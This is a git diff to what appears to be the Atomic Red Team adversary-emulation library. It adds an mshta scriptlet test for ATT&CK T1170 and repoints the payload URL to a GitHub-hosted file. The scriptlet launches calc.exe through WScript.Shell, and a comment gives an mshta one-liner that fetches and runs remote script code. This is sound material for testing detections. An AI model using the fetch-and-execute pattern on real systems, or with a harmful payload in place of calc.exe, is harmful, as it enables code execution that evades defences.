diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index 47916540..c2cc3b93 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -12,7 +12,7 @@ atomic_tests:
     file_url:
       description: location of the payload
       type: Url
-      default: https://www.example.com/mshta.sct
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct
   executor:
     name: command_prompt
     command: |
diff --git a/atomics/T1170/mshta.sct b/atomics/T1170/mshta.sct
new file mode 100644
index 00000000..a5bf6537
--- /dev/null
+++ b/atomics/T1170/mshta.sct
@@ -0,0 +1,29 @@
+<?XML version="1.0"?>
+<scriptlet>
+  <!-- Test -->
+  <!-- mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct")).Exec();close(); -->
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>